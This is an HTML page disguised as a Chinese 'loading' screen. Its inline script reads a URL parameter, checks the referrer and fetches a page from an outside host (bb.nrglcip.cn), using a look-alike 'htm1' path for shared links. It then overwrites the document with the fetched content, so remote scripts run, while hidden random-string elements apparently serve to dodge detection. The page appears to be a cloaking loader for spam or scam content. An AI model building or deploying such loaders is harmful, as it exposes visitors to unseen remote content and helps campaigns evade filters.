<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zDGvpm {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zDGvpm .PrQPVtO9K {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zDGvpm .content {
            line-height: 50px;
            text-align: center
        }

        .zDGvpm .img {
            width: 100%
        }

        .zDGvpm .KWCMz48u3O {
            text-align: center
        }

        .zDGvpm .KWCMz48u3O span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zDGvpm .KWCMz48u3O span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zDGvpm .KWCMz48u3O span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zDGvpm .KWCMz48u3O span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zDGvpm .KWCMz48u3O span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zDGvpm .KWCMz48u3O span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zDGvpm .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Dbi6lUM7c(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var D3C07A = Dbi6lUM7c('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ D3C07A +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ D3C07A +".html?a=share";
		}
		
        QuYI9zVuID=url+"#"+new Date().getTime();
        QuYI9zVuID && function() {
            $.get(QuYI9zVuID, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >kQyT0W5rYtXbFfUFmumsiTMe7tYT4eyavNzyLWy9</b>
<b style='display:none' >kQyT0W5rYtXbFfUFmumsiTMe7tYT4eyavNzyLWy9</b>
<ul style='display:none' >xp8q6FqtyChpV6LEmh693P091YT8</ul>
<li style='display:none' >GSFB2PHPm7duZuopXUf</li>
<div style='display:none'>jOnr2kCpvGr8b5n8FzLnXbOr5qJ4zkdz5FvzRhrFWkGY9V50u</div>
<li style='display:none' >GSFB2PHPm7duZuopXUf</li>
<ul style='display:none' >xp8q6FqtyChpV6LEmh693P091YT8</ul>
<li style='display:none' >GSFB2PHPm7duZuopXUf</li>
<h1 style='display:none' >oxfvpBF5ckL0jqTw2rL7pwBmoT8KRQIlu0ubadW7mzfS37qSHlw</h1>
<span style='display:none'>rIRBGK60iaP3q6HoJgXArxmeL8JxpkbgRV6CB7w2WvDs9NZF6rzAZOFzvaKwc7LP1dARTQ9GZzGkyyiZrbt</span><div class="zDGvpm">
    <div class="PrQPVtO9K">
        <div class="KWCMz48u3O">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<span style='display:none'>hDYjRirkYTfS9CStDD4jO2hYQOkxoyGt9YdSIBwZKUVB1hUCaheZ4R3kEQ0v9tJobQ3gOxXIIgYWewLNI4LXDUeNQIyA7TeqGhvV</span>
<a  href='#' style='display:none'>LeCUaR6CNJLDMd70inm7od21GV3Qbziz2G8qXtUSf7jj3gx</a>
<div style='display:none'>i6BakIfBYj3wg3R3YMO9mQJ8GK</div>
<p  style='display:none'>HXSdLKdZ9fRGHo3gFcKlV0aMCbQlBuD1a5Mxp</p>
<h1 style='display:none' >zZpMemPG8rBxxW01pmRM4cW1ZgLL0K9gNbdZ</h1>
<li style='display:none' >E7QqiYmO7wilwG1WY4o1ssonQpBRuEwoTLTBEInUa23KRPfvnMCEMNleVIxqbc</li>
<b style='display:none' >d9dENX2kWJVgurCrxGuFjLYmenRX80wCkBO0Y1azQMtBhikQsuVqkH84D</b></body>
</html>